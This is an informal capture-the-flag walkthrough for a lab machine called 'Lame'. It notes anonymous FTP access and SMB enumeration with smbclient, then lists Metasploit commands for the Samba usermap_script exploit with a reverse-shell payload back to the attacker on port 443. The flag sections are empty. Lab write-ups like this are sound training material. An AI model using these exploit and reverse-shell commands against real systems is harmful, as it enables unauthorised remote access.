Lame

Recon
How many of the nmap top 1000 TCP ports are open on the remote host?

i will see the port open FTP - 21 with login Anonymous and Password Anonymous
ftp 10.10.10.3


but can't expliot ftp come i will try expliot using smb
With Passweord Protected OFF
smbclient -L 10.10.10.3


Initial Access
exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set lhost tun0
set lport 443

Root Flag

User Flag

Exploits Used
msfconsole
exploit/multi/samba/usermap_script
Tools Used
Nmap
smbclient
nc
Last updated